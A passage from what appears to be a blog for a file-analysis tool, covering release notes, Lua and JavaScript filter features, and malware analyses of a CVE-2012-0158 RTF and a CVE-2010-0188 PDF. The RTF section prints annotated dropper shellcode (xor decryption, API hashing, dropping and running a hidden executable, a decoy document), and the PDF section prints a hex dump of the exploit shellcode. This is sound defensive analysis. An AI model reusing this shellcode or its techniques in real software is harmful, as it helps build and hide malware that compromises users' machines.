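        if not byte & 0x80:
            if byte & 0x40:               # sign bit of the last byte
                result -= 1 << shift
            break
    return result, pos - offset

print(read_uleb128(bytes([0xE5, 0x8E, 0x26])))  # (624485, 3)
print(read_sleb128(bytes([0xC0, 0xBB, 0x78])))  # (-123456, 3)
```

A truncated buffer raises an IndexError in this sketch; real parsing code would want to validate the input more carefully.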

Given the SDK capabilities, it’s easy to perform custom scans on Mach-Os or to create plugins.

That’s all. Hope you enjoyed and don’t be shy if you have feature requests or suggestions. 😉
Author: Erik Pistelli. Posted on June 24, 2013 (updated April 1, 2021). Categories: Suite Standard. Tags: Code Signature, Executable, Fat Binary, Mac OS X, OSX, Universal Binary.

News for version 0.9.5

We’re happy to present to you the new version of the Profiler with the following news:

– introduced Lua filters: lua/custom and lua/loop
– added optional condition to misc/basic
– added JavaScript execute action
– added JavaScript debugger
– simplified save report/project logic
– included actions among the extensions views
– improved detection of shellcodes
– introduced max file size option for shellcode detection
– improved OLE Streams parsing and extraction from RTFs
– exposed getHash method in ScanProvider to Python
– added text replace functionality to text controls

While most of the items in the list have been discussed in previous posts, some of them need a brief introduction.

Max file size for shellcode detection

While shellcode detection applies by default to files of any size, you might want to specify a threshold.

This is useful if you want to speed up the analysis of large files.

The ‘getHash’ method

This method should be used by hooks to retrieve a hash for the currently scanned file. The syntax is very simple:

sp.getHash("md5")

Of course one could use a filter to hash the file, but the advantage of this method is that once a particular hash type has been computed it won’t be computed again if requested by another hook.
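The caching behaviour can be pictured with a few lines of plain Python. This is only a sketch of the idea and not how the ScanProvider is implemented: the HashCache class and its computations counter are hypothetical, and it uses hashlib with SHA-256 instead of the SDK.

```python
import hashlib

class HashCache:
    """Compute each hash type at most once for a given piece of data."""

    def __init__(self, data):
        self._data = data
        self._cache = {}
        self.computations = 0  # how many hashes were actually computed

    def get_hash(self, name):
        if name not in self._cache:
            self._cache[name] = hashlib.new(name, self._data).hexdigest()
            self.computations += 1
        return self._cache[name]

cache = HashCache(b"abc")
first = cache.get_hash("sha256")   # computed
second = cache.get_hash("sha256")  # served from the cache
print(first == second, cache.computations)  # True 1
```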

Improved OLE Streams parsing and extraction from RTFs

In one of the previous use cases we’ve analyzed a huge set of malicious RTF documents. Some of them were not recognized correctly and some of them showed problems in the automatic extraction of OLE streams. This release fixes these issues.

As you can see all RTFs are now correctly parsed and their OLE stream has been extracted. Some of the OLE objects though are not extracted correctly. After looking into it, it seems to be a problem with the malicious files themselves. OLE streams are encoded as hex strings into the RTF and in some of these files there’s an extra byte which invalidates the sequence.

01 05 00 00 02 00 00 00 1B 00 00 00 A 4D

That ‘A’ character between 00 and 4D causes the sequence to be read as 00 A4 D, which is incorrect. Our guess is that the malware generator which produced these RTFs output some invalid ones by inserting an ‘A’ character instead of a 0x0A newline.
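The misalignment is easy to reproduce. The sketch below works on the sample sequence exactly as printed above, so it can rely on whitespace to spot the stray character; that is an assumption made for illustration, since real RTF hex data is not necessarily delimited this way. Both helpers are hypothetical.

```python
import re

def decode_hex_stream(text):
    """Decode hex digits, ignoring whitespace; fail on an odd digit count."""
    digits = re.sub(r"\s+", "", text)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(digits)

def drop_stray_digits(text):
    """Remove whitespace-delimited tokens that are not two characters long."""
    return " ".join(token for token in text.split() if len(token) == 2)

broken = "01 05 00 00 02 00 00 00 1B 00 00 00 A 4D"

# Pairing the digits the way a reader would shows the shifted tail.
digits = broken.replace(" ", "")
pairs = [digits[i:i + 2] for i in range(0, len(digits), 2)]
print(pairs[-3:])  # ['00', 'A4', 'D']

patched = decode_hex_stream(drop_stray_digits(broken))
print(patched[-2:].hex())  # 004d
```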

While RTF readers are not able to parse these objects either, it’s still interesting for our analysis to be able to inspect them. So we just load the RTF files, patching the ‘A’ character with a filter as in the screenshot below.

That fixes it and we are now able to inspect the embedded OLE object and its threats. As you can see, we get the shellcode disassembly directly from the automatic analysis.

Enjoy!
Author: Erik Pistelli. Posted on June 7, 2013 (updated April 1, 2021). Categories: Suite Standard. Tags: News.

JavaScript Analysis

The upcoming 0.9.5 version of the Profiler introduces tools to interactively analyze JavaScript code. In a few words it adds the capability to execute snippets of code or to debug them. The JavaScript engine used is the one in WebKit.

Let’s take a look at the newly introduced actions:

The ‘Execute JavaScript’ action executes a script and lets the user decide whether to process ‘eval’ calls or not.

Even when ‘eval‘ calls are not being processed, the argument is still printed out for the user to inspect. And in case ‘eval‘s are performed, then the result (if any) is printed out as well.

js_eval: print('hello world'); 1 + 1
js_print: hello world
js_eval_result: 2

Let’s take a look at the same code under the JavaScript debugger. Given the JavaScript debug capabilities already in Qt, it was easy to integrate a full-fledged debugger:

The debugger can be executed as a stand-alone utility (jsdbg.exe) as well.

It shouldn’t take long before the new version is ready and then we’ll see these features in action against some real world samples. Stay tuned!
Author: Erik Pistelli. Posted on June 3, 2013 (updated April 1, 2021). Categories: Suite Standard. Tags: Debug, EcmaScript, Exec, JS.

Custom filters: Lua and misc/basic

Filters were introduced last year, among them the very useful ‘misc/basic‘. The upcoming 0.9.5 version of the Profiler improves this filter by introducing the condition parameter.

For instance, let’s take the following filter:

It xors every byte that is different from 0xFF and 0. The ‘misc/basic‘ filter can be used to express even more complex operations such as:

In this case the filter xors every third dword with 0xAABBCCDD, following the pattern ‘xor skip skip’, in little endian mode and only if the value is different from 0 and 0xAABBCCDD. While lots of operations can be expressed with this filter, there are limits.
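The operation described above can be emulated in a few lines of plain Python. This is only a sketch of the described behaviour, not the filter's implementation: the function name is hypothetical, and it assumes that the pattern starts with the first dword and that trailing bytes which don't fill a whole dword are left untouched.

```python
import struct


def xor_every_third_dword(data, key=0xAABBCCDD):
    """Emulate the 'xor skip skip' pattern on little-endian dwords."""
    out = bytearray(data)
    # Walk over whole dwords only; a trailing partial dword is not modified.
    for index, offset in enumerate(range(0, len(out) - 3, 4)):
        if index % 3 != 0:
            continue  # the two 'skip' slots of the pattern
        (value,) = struct.unpack_from("<I", out, offset)
        # Condition: leave 0 and the key itself unchanged.
        if value != 0 and value != key:
            struct.pack_into("<I", out, offset, value ^ key)
    return bytes(out)


sample = struct.pack("<6I", 1, 2, 3, 0, 5, 6)
print(struct.unpack("<6I", xor_every_third_dword(sample)))
```

Because 0 and the key are excluded, the operation is its own inverse: applying it twice returns the original data.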

This is why Lua filters have been introduced. Right now there are two such filters available: ‘lua/custom‘ and ‘lua/loop‘. Let’s start with the second one which is just a shortcut.

if e ~= 0 and e ~= 0xFF then
    e = bit.bxor(e, 0xFF)
end

This script does the exact same thing as the first example of the ‘misc/basic‘ filter: it xors every byte that is different from 0xFF and 0. In this specific case there’s no reason to use a Lua filter. In fact, Lua filters are considerably slower than native filters. Thus, they should be used only when the operation is too complex to be expressed with any of the default filters.

While ‘lua/loop‘ is intended for simple loop operations, ‘lua/custom‘, as the name suggests, can be used to implement a custom filter logic. Here’s an example, which again does the same thing as the previous example:

function run(filter)
    local c = filter:container()
    local size = c:size()
    local offset = 0
    local bsize = 16384
    while size ~= 0 do
        if bsize > size then bsize = size end
        local block = c:read(offset, bsize)
        local boffs = 0
        while boffs < bsize do
            local e = block:readU8(boffs)
            if e ~= 0 and e ~= 0xFF then e = bit.bxor(e, 0xFF) end
            block:writeU8(boffs, e)
            boffs = boffs + 1
        end
        c:write(offset, block)
        offset = offset + bsize
        size = size - bsize
    end
    return Base.FilterErr_None
end

The security of these scripting filters is very high. They run in a special sandboxed environment, have access only to a minimum set of secure functions, are limited in memory consumption (2 MB by default, but it can be configured from the settings) and can be interrupted at any time by the user.

If you still don't wish to allow script filters, they can be disabled from the settings.

The Lua VM is almost vanilla: the only difference is that it allows for 64-bit numbers. As you can observe from the examples, the Lua library for bitwise operations has been renamed from 'bit32' to 'bit'.

We'll see some practical usage samples in the near future. Stay tuned!
Author: Erik Pistelli. Posted on May 30, 2013 (updated April 1, 2021). Categories: Suite Standard. Tags: Decryption, Lua.

CVE-2012-0158: RTF/OLE/CFBF/PE

Since support for the RTF file format was added very recently, with version 0.9.4 of the Profiler, it’s a good idea to test it against real malware. I downloaded a pack of RTFs from contagiodump.blogspot.com and, as I promised in the last post, chose a more recent vulnerability: CVE-2012-0158. I picked this particular RTF from the pack because most of the RTFs were automatically recognized and analyzed by the Profiler, while the following sample offers us a chance for some nice interactive analysis.

The first problem, as you can see from the screenshot, is that the RTF is not being automatically identified as such. That is because the signature is incomplete: the last two letters are missing. The next version of the Profiler will improve the detection in this regard. However, we can easily load it as RTF ourselves.

The RTF contains a lot of foreign data (meaning data which is not part of the RTF itself). Looking at the pattern, an educated guess would be that it’s an encrypted payload.

The OLE stream contained in the RTF is flagged as containing possible shellcode. The Profiler detects it correctly. However, it’s actually the object embedded in the OLE stream which contains the shellcode. But wait, there’s no embedded object visible. This is because the extraction of the object failed, since the format of the OLE stream (which is undocumented) is different than usual. This is not a problem: we can just as easily load the object ourselves, as the signature is easily recognizable.

This last step was not strictly necessary, since we already had a detected shellcode in the OLE stream, but it increases the completeness of the analysis.

Since this is the header of the OLE stream:

Offset     0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F   Ascii
00000000  01 05 00 00 02 00 00 00 1B 00 00 00 4D 53 43 6F   ............MSCo
00000010  6D 63 74 6C 4C 69 62 2E 4C 69 73 74 56 69 65 77   mctlLib.ListView
00000020  43 74 72 6C                                       Ctrl

Another educated guess would be that this is the component affected by the vulnerability. Let’s go back to the detected shellcode.
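The header bytes shown above can also be picked apart with a few lines of Python. This is only a sketch: the post doesn't name the fields, so reading them as two little-endian dwords followed by a length-prefixed ANSI string is an assumption suggested by the dump itself, and `parse_stream_header` is a hypothetical helper. The dump stops after "Ctrl", so the name comes out shorter than the declared 0x1B bytes.

```python
import struct

# The 36 bytes visible in the hex dump above.
HEADER = bytes.fromhex(
    "01050000" "02000000" "1B000000"
    "4D53436F6D63746C4C69622E4C69737456696577"
    "4374726C"
)


def parse_stream_header(data):
    """Read two dwords and a length-prefixed name (assumed layout)."""
    first, second, name_len = struct.unpack_from("<III", data, 0)
    # The slice is simply shorter if the data ends before name_len bytes.
    raw_name = data[12:12 + name_len]
    name = raw_name.split(b"\x00")[0].decode("ascii")
    return first, second, name_len, name


first, second, name_len, name = parse_stream_header(HEADER)
print(hex(first), second, hex(name_len), name)
```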

The initial instructions make sense, while the following ones do not. Let’s take a closer look.

00000920: nop
00000921: nop
00000922: nop
00000923: nop
00000924: jmp 0x936
00000926: pop edx
00000927: dec edx
00000928: xor ecx, ecx
0000092A: mov cx, 0x2da
0000092E: xor byte ptr [edx+ecx*1], 0xee
00000932: loop 0x92e
00000934: jmp 0x93b
00000936: call 0x926

This portion of code is easily recognizable as being a decryption loop for the code that follows. This is usually implemented to avoid detection. Didn’t work this time.
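The decryption loop can be replayed in Python to make the range explicit. This is a minimal sketch, assuming the addresses in the listing can be used directly as offsets into the buffer; the function name is hypothetical. The `call 0x926` pushes the address of the byte that follows it (0x93B), `dec edx` moves one byte back, and the loop then xors `edx+ecx` for `ecx` going from 0x2DA down to 1.

```python
def decrypt_stub_payload(data, start=0x93B, size=0x2DA, key=0xEE):
    """Replay the xor loop: 'size' bytes beginning at 'start' are xored."""
    out = bytearray(data)
    edx = start - 1                    # pop edx; dec edx
    for ecx in range(size, 0, -1):     # loop: ecx counts down to 1
        out[edx + ecx] ^= key          # xor byte ptr [edx+ecx*1], 0xee
    return bytes(out)


# Dummy buffer just large enough to hold the encrypted range.
buf = bytes(0x93B + 0x2DA + 4)
dec = decrypt_stub_payload(buf)
print(hex(dec[0x93B]), hex(dec[0x93B + 0x2DA - 1]))  # 0xee 0xee
```

In other words, the encrypted code is the 0x2DA bytes starting right after the `call`, which is the range to select for the xor filter.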

Let’s select the encrypted shellcode.

And decrypt it with the xor filter. We can confirm the correctness of the decryption by adding the ‘disasm/x86‘ filter.

Back to the decrypted bytes, we use the script presented in the previous post to create an executable from the shellcode.

A quick analysis with the help of the debugger.

00001000: mov ebp, esp ; init
00001002: sub esp, 0x280
00001008: mov dword ptr [ebp-0x44], 0x27a3b
0000100F: mov dword ptr [ebp-0x50], 0x1c400
00001016: mov dword ptr [ebp-0x5c], 0x8e00
0000101D: jmp 0x12c1
00001022: pop ebx ; ebx = address of DATA
00001023: mov dword ptr [ebp-0x4c], ebx
00001026: call 0x1250 ; retrieves base of kernel32.dll
0000102B: mov dword ptr [ebp], eax
0000102E: mov ebx, eax
00001030: push ebx
00001031: push 0x5b8aca33
00001036: call 0x1269 ; retrieves address of GetTempPathA
0000103B: mov dword ptr [ebp-0x4], eax
0000103E: push ebx
0000103F: push 0xbfc7034f
00001044: call 0x1269 ; retrieves address of SetCurrentDirectoryA
00001049: mov dword ptr [ebp-0x8], eax
0000104C: push ebx
0000104D: push 0x7c0017a5
00001052: call 0x1269 ; retrieves address of CreateFileA
00001057: mov dword ptr [ebp-0x38], eax
0000105A: push ebx
0000105B: push 0xdf7d9bad
00001060: call 0x1269 ; retrieves address of GetFileSize
00001065: mov dword ptr [ebp-0x10], eax
00001068: push ebx
00001069: push 0x76da08ac
0000106E: call 0x1269 ; retrieves address of SetFilePointer
00001073: mov dword ptr [ebp-0x14], eax
00001076: push ebx
00001077: push 0x10fa6516
0000107C: call 0x1269 ; retrieves address of ReadFile
00001081: mov dword ptr [ebp-0x18], eax
00001084: push ebx
00001085: push 0xe80a791f
0000108A: call 0x1269 ; retrieves address of WriteFile
0000108F: mov dword ptr [ebp-0x1c], eax
00001092: push ebx
00001093: push 0xffd97fb
00001098: call 0x1269 ; retrieves address of CloseHandle
0000109D: mov dword ptr [ebp-0x20], eax
000010A0: push ebx
000010A1: push 0xc0397ec
000010A6: call 0x1269 ; retrieves address of GlobalAlloc
000010AB: mov dword ptr [ebp-0x24], eax
000010AE: push ebx
000010AF: push 0x45b06d76
000010B4: call 0x1269 ; retrieves address of GetModuleFileNameA
000010B9: mov dword ptr [ebp-0x28], eax
000010BC: push ebx
000010BD: push 0x7cb922f6
000010C2: call 0x1269 ; retrieves address of GlobalFree
000010C7: mov dword ptr [ebp-0x2c], eax
000010CA: push ebx
000010CB: push 0x73e2d87e
000010D0: call 0x1269 ; retrieves address of ExitProcess
000010D5: mov dword ptr [ebp-0x30], eax
000010D8: push ebx
000010D9: push 0xe8afe98
000010DE: call 0x1269 ; retrieves address of WinExec
000010E3: mov dword ptr [ebp-0x34], eax
000010E6: push ebx
000010E7: push 0x78b5b983
000010EC: call 0x1269 ; retrieves address of TerminateProcess
000010F1: mov dword ptr [ebp-0x84], eax
000010F7: and dword ptr [ebp-0x48], 0x100
000010FE: add dword ptr [ebp-0x48], 0x4 ; increment handle
00001102: push 0x0
00001104: push dword ptr [ebp-0x48]
00001107: call dword ptr [ebp-0x10] ; GetFileSize
0000110A: cmp eax, dword ptr [ebp-0x44] ; compares with 0x27A3B -> 162363 own file size
0000110D: jnz 0x10fe ; repeat loop if it doesn't match
0000110F: push 0x0 ; dwMoveMethod = FILE_BEGIN
00001111: push 0x0 ; lpDistanceToMoveHigh
00001113: push 0x283b ; lDistanceToMove
00001118: push dword ptr [ebp-0x48] ; hFile
0000111B: call dword ptr [ebp-0x14] ; SetFilePointer
0000111E: push 0x636f64
00001123: push 0x2e726f57 ; pushes the string Wor.doc on the stack
00001128: mov dword ptr [ebp-0x68], esp ; saves string location
0000112B: lea ebx, ptr [ebp-0x100]
00001131: push ebx ; lpBuffer
00001132: push 0x100 ; nBufferLength
00001137: call dword ptr [ebp-0x4] ; GetTempPathA
0000113A: push ebx ; lpPathName
0000113B: call dword ptr [ebp-0x8] ; SetCurrentDirectory
0000113E: push 0x0 ; hTemplateFile
00001140: push 0x6 ; dwFlagsAndAttributes = SYSTEM | HIDDEN
00001142: push 0x2 ; dwCreationDisposition
00001144: push 0x0 ; lpSecurityAttributes
00001146: push 0x3 ; dwShareMode
00001148: push 0x40000000 ; dwDesiredAccess
0000114D: push dword ptr [ebp-0x4c] ; lpFileName = WORD.exe (from DATA)
00001150: call dword ptr [ebp-0x38] ; CreateFileA
00001153: mov dword ptr [ebp-0x54], eax ; file handle
00001156: mov eax, dword ptr [ebp-0x50] ; eax = 0x1c400
00001159: cmp eax, dword ptr [ebp-0x5c] ; compare with 0x8e00
0000115C: jnbe 0x1161 ; allocate the biggest size: eax = max(0x1c400, 0x8e00)
0000115E: mov eax, dword ptr [ebp-0x5c]
00001161: push eax ; dwBytes
00001162: push 0x40 ; uFlags = GMEM_ZEROINIT
00001164: call dword ptr [ebp-0x24] ; GlobalAlloc
00001167: mov dword ptr [ebp-0x60], eax ; allocated memory
0000116A: xchg esi, eax
0000116B: push 0x0 ; lpOverlapped
0000116D: lea edx, ptr [ebp-0x64]
00001170: push edx ; lpNumberOfBytesRead
00001171: push dword ptr [ebp-0x50] ; nNumberOfBytesToRead = 0x1c400
00001174: push esi ; lpBuffer = allocated memory
00001175: push dword ptr [ebp-0x48] ; hFile
00001178: call dword ptr [ebp-0x18] ; ReadFile
0000117B: mov ecx, dword ptr [ebp-0x50] ; ecx = size
0000117E: call 0x123d ; decrypts executable
00001183: push 0x0 ; lpOverlapped
00001185: lea edx, ptr [ebp-0x64]
00001188: push edx ; lpNumberOfBytesWritten
00001189: push dword ptr [ebp-0x50] ; nNumberOfBytesToWrite
0000118C: push esi ; lpBuffer
0000118D: push dword ptr [ebp-0x54] ; hFile
00001190: call dword ptr [ebp-0x1c] ; WriteFile
00001193: push dword ptr [ebp-0x54] ; hObject
00001196: call dword ptr [ebp-0x20] ; CloseHandle
00001199: push 0x0 ; uCmdShow
0000119B: push dword ptr [ebp-0x4c] ; lpCmdLine = WORD.exe
0000119E: call dword ptr [ebp-0x34] ; WinExec
000011A1: push 0x0 ; dwMoveMethod = FILE_BEGIN
000011A3: push 0x0 ; lpDistanceToMoveHigh
000011A5: push 0x1ec3b ; lDistanceToMove
000011AA: push dword ptr [ebp-0x48] ; hFile = own file handle
000011AD: call dword ptr [ebp-0x14] ; SetFilePointer
000011B0: push 0x0 ; hTemplateFile
000011B2: push 0x80 ; dwFlagsAndAttributes
000011B7: push 0x2 ; dwCreationDisposition
000011B9: push 0x0 ; lpSecurityAttributes
000011BB: push 0x0 ; dwShareMode
000011BD: push 0x40000000 ; dwDesiredAccess
000011C2: push dword ptr [ebp-0x68] ; lpFileName = Wor.doc
000011C5: call dword ptr [ebp-0x38] ; CreateFileA
000011C8: mov dword ptr [ebp-0x54], eax ; new file handle
000011CB: push 0x0 ; lpOverlapped
000011CD: lea edx, ptr [ebp-0x64]
000011D0: push edx ; lpNumberOfBytesRead
000011D1: push dword ptr [ebp-0x5c] ; nNumberOfBytesToRead = 0x8e00
000011D4: push dword ptr [ebp-0x60] ; lpBuffer = allocated memory
000011D7: push dword ptr [ebp-0x48] ; hFile
000011DA: call dword ptr [ebp-0x18] ; ReadFile
000011DD: mov esi, dword ptr [ebp-0x60]
000011E0: mov ecx, dword ptr [ebp-0x5c] ; ecx = 0x8e00
000011E3: call 0x123d ; decrypts doc
000011E8: mov esi, dword ptr [ebp-0x60]
000011EB: push 0x0 ; lpOverlapped
000011ED: lea edx, ptr [ebp-0x64]
000011F0: push edx ; lpNumberOfBytesWritten
000011F1: push dword ptr [ebp-0x5c] ; nNumberOfBytesToWrite
000011F4: push esi ; lpBuffer
000011F5: push dword ptr [ebp-0x54] ; hFile
000011F8: call dword ptr [ebp-0x1c] ; WriteFile
000011FB: push dword ptr [ebp-0x54] ; hObject
000011FE: call dword ptr [ebp-0x20] ; CloseHandle
00001201: push dword ptr [ebp-0x48] ; hObject
00001204: call dword ptr [ebp-0x20] ; CloseHandle
00001207: push 0x100 ; nSize
0000120C: lea ebx, ptr [ebp-0x100]
00001212: push ebx ; lpFilename
00001213: push 0x0 ; hModule
00001215: call dword ptr [ebp-0x28] ; GetModuleFileNameA
00001218: mov esi, ebx ; strlen
0000121A: inc esi
0000121B: cmp byte ptr [esi], 0x0
0000121E: jnz 0x121a
00001220: mov edi, esi
00001222: mov byte ptr [edi], 0x20 ; appends ' '
00001225: inc edi
00001226: mov esi, dword ptr [ebp-0x68] ; appends Wor.doc
00001229: mov ecx, 0x16
0000122E: rep movsd dword ptr [edi], dword ptr [esi]
00001230: push 0x5 ; uCmdShow
00001232: push ebx ; lpCmdLine = current exe name + " Wor.doc"
00001233: call dword ptr [ebp-0x34] ; WinExec
00001236: xor eax, eax
00001238: push eax ; uExitCode
00001239: call dword ptr [ebp-0x30] ; ExitProcess

; decrypts payload
0000123D: pushad
0000123E: mov edi, esi
00001240: lodsb byte ptr [esi]
00001241: cmp al, 0x0
00001243: jz 0x124b
00001245: cmp al, 0xfc
00001247: jz 0x124b
00001249: xor al, 0xfc
0000124B: stosb byte ptr [edi]
0000124C: loop 0x1240
0000124E: popad
0000124F: ret

; retrieves base of kernel32.dll
00001250: push esi
00001251: mov ebx, dword ptr fs:[0x30]
00001258: mov ebx, dword ptr [ebx+0xc]
0000125B: mov ebx, dword ptr [ebx+0x14]
0000125E: mov ebx, dword ptr [ebx]
00001260: mov ebx, dword ptr [ebx]
00001262: mov eax, dword ptr [ebx+0x10]
00001265: pop esi
00001266: ret 0x4

; retrieves address of API
00001269: push ebx
0000126A: push ebp
0000126B: push esi
0000126C: push edi
0000126D: mov ebp, dword ptr [esp+0x18]
00001271: mov eax, dword ptr [ebp+0x3c]
00001274: mov edx, dword ptr [ebp+eax*1+0x78]
00001278: add edx, ebp
0000127A: mov ecx, dword ptr [edx+0x18]
0000127D: mov ebx, dword ptr [edx+0x20]
00001280: add ebx, ebp
00001282: jecxz 0x12b6
00001284: dec ecx
00001285: mov esi, dword ptr [ebx+ecx*4]
00001288: add esi, ebp
0000128A: xor edi, edi
0000128C: cld
0000128D: xor eax, eax
0000128F: lodsb byte ptr [esi]
00001290: cmp al, ah
00001292: jz 0x129b
00001294: ror edi, 0xd
00001297: add edi, eax
00001299: jmp 0x128d
0000129B: cmp edi, dword ptr [esp+0x14]
0000129F: jnz 0x1282
000012A1: mov ebx, dword ptr [edx+0x24]
000012A4: add ebx, ebp
000012A6: mov cx, word ptr [ebx+ecx*2]
000012AA: mov ebx, dword ptr [edx+0x1c]
000012AD: add ebx, ebp
000012AF: mov eax, dword ptr [ebx+ecx*4]
000012B2: add eax, ebp
000012B4: jmp 0x12b8
000012B6: xor eax, eax
000012B8: mov edx, ebp
000012BA: pop edi
000012BB: pop esi
000012BC: pop ebp
000012BD: pop ebx
000012BE: ret 0x8
000012C1: call 0x1022

;
; DATA
;
Offset    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F   Ascii
000002C0  57 4F 52 44 2E 65 78 65 00 00   WORD.exe..
000002D0  00 00 00 00 00 00 00 00 00 00   ..........

The debugger was necessary only to check which APIs are retrieved by the shellcode, and from there static analysis was easy. To sum up, the shellcode decrypts two files, an executable and a doc file, executes the first directly and opens the second with the same program which is executing the shellcode.
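The API names don't actually require a debugger: the lookup routine at 0x1269 rotates a 32-bit accumulator right by 0xD bits and adds each character of the export name, so the pushed constants can be reproduced offline. Here is a minimal Python sketch of that hash; the function names are hypothetical.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by 'count' bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def api_hash(name, rotation=13):
    """Hash an export name the way the loop at 0x128D does."""
    h = 0
    for ch in name.encode("ascii"):
        # ror edi, 0xd ; add edi, eax
        h = (ror32(h, rotation) + ch) & 0xFFFFFFFF
    return h


print(hex(api_hash("WinExec")))  # 0xe8afe98
```

Hashing every export name of kernel32.dll this way and comparing the results against the pushed constants gives the same mapping as the comments in the listing.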

From the shellcode we can retrieve the ranges of the encrypted payloads:

offset: 0x283b size: 0x1c400
offset: 0x1ec3b size: 0x8e00

Now we can open the encrypted payloads and apply the simple decryption code.

from Pro.UI import proContext, ProView

view = proContext().getCurrentView()
if view.isValid() and view.type() == ProView.Type_Hex:
    b = view.readBytes(0, view.getSize())
    for x in range(len(b)):
        if b[x] != 0 and b[x] != 0xFC:
            b[x] = b[x] ^ 0xFC
    view.setBytes(b)

We save the decrypted payloads to disk. In the near future this won’t be necessary as such a filter will be easily created and used to load files inside the workspace of the Profiler itself.
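As a cross-check, the same extraction can be sketched as a standalone Python script that works outside the Profiler. The offsets, sizes, file size and xor rule come from the shellcode above; the function names and the payload labels are hypothetical. The sketch also verifies that the two ranges are adjacent and end exactly at the 0x27A3B file size the shellcode looks for.

```python
FILE_SIZE = 0x27A3B
PAYLOADS = [
    ("executable", 0x283B, 0x1C400),
    ("document", 0x1EC3B, 0x8E00),
]


def decrypt(block, key=0xFC):
    """Xor every byte with the key, leaving 0 and the key itself untouched."""
    return bytes(b if b in (0, key) else b ^ key for b in block)


def ranges_fill_file(payloads, file_size):
    """Check that the ranges are contiguous and end at the file size."""
    pos = payloads[0][1]
    for _, offset, size in payloads:
        if offset != pos:
            return False
        pos = offset + size
    return pos == file_size


def extract(data, offset, size):
    """Cut one encrypted range out of the RTF and decrypt it."""
    return decrypt(data[offset:offset + size])


print(ranges_fill_file(PAYLOADS, FILE_SIZE))  # True
```

With the RTF loaded into `data`, calling `extract(data, offset, size)` for each entry yields the two decrypted files.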

We can use the safe text preview of Word Documents in the Profiler to view the text of the document opened by the shellcode.

From the text it seems to be directed at something gov: “My Esteemed Colleagues; Members of the Board of Governors of the Indian Business Chamber in Vietnam”.

The reason for opening the second document is clearly that the instance of the original program which ran the shellcode would’ve crashed and was therefore terminated cleanly with ExitProcess by the shellcode itself. Spawning a second instance with a clean document doesn’t make the user suspicious: from his point of view he just opened a document and a document has indeed been opened.

The executable is not protected by any means, so it’s just a matter of opening it with IDA Pro and spending a few hours understanding the whole code. But that’s beyond the scope of this demonstration.
Author: Erik Pistelli. Posted on May 23, 2013 (updated April 1, 2021). Categories: Suite Standard. Tags: CVE-2012-0158, OLE.

CVE-2010-0188: PDF/Form/TIFF

Given the good reception of the last post, I’ve decided to dedicate more time to posting use cases for the Profiler. Today we’re going to analyze a PDF exploiting CVE-2010-0188. It's quite old, as the name tells, but that doesn’t really matter for the sake of the demonstration. There’s no particular reason why I picked this one, I just downloaded a pack of malicious PDFs from contagiodump.blogspot.com.

Opening the Zip archive with the Profiler, I chose a random PDF. It is flagged as risky by the Profiler, because it contains an interactive form. If we take a look at the embedded form it’s easy to recognize an embedded image in it which basically represents the whole data of the form. Let’s load this image as an embedded file:

We need to specify the ‘convert/from_base64‘ filter in order to load the actual data. The content of the image is quite obvious. Lots of repetitive bytes, some suspicious strings and some bytes with higher entropy which a trained eye can easily spot as being x86 instructions.

Offset     0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F   Ascii
00000000  4D 4D 00 2A 00 00 20 38 0C 90 0C 90 0C 90 0C 90   MM.*...8........
00000010  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000020  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000030  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000040  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000050  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000060  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000070  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000080  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000090  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
000000A0  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
000000B0  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
000000C0  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
000000D0  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
000000E0  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
000000F0  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000100  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000110  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000120  0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90   ................
00000130  0C 90 0C 90 EB 46 5F 31 C9 83 E9 01 89 FE 30 C0   .....F_1......0.
00000140  2C 01 F2 AE FE 47 FF 89 FB 30 C0 2C 01 F2 AE FE   ,....G...0.,....
00000150  47 FF 89 FD F2 AE FE 47 FF EB 71 60 31 C9 64 8B   G......G..q`1.d.
00000160  71 30 8B 76 0C 8B 76 1C 8B 5E 08 8B 56 20 8B 36   q0.v..v..^..V..6
00000170  66 39 4A 18 75 F2 89 5C 24 1C 61 C3 EB 5B 60 8B   f9J.u..\$.a..[`.
00000180  6C 24 24 8B 45 3C 8B 54 05 78 01 EA 8B 4A 18 8B   l$$.E<.T.x...J..
00000190  5A 20 01 EB E3 34 49 8B 34 8B 01 EE 31 FF 31 C0   Z....4I.4...1.1.
000001A0  FC AC 84 C0 74 07 C1 CF 12 01 C7 EB F4 3B 7C 24   ....t........;|$
000001B0  28 75 E1 8B 5A 24 01 EB 66 8B 0C 4B 8B 5A 1C 01   (u..Z$..f..K.Z..
000001C0  EB 8B 04 8B 01 E8 89 44 24 1C 61 C3 EB 54 31 D2   .......D$.a..T1.
000001D0  52 52 53 55 52 FF D0 EB 1A EB 5D E8 7B FF FF FF   RRSUR.....].{...
000001E0  BA E7 BA 8B C4 52 50 E8 92 FF FF FF 31 D2 52 FF   .....RP.....1.R.
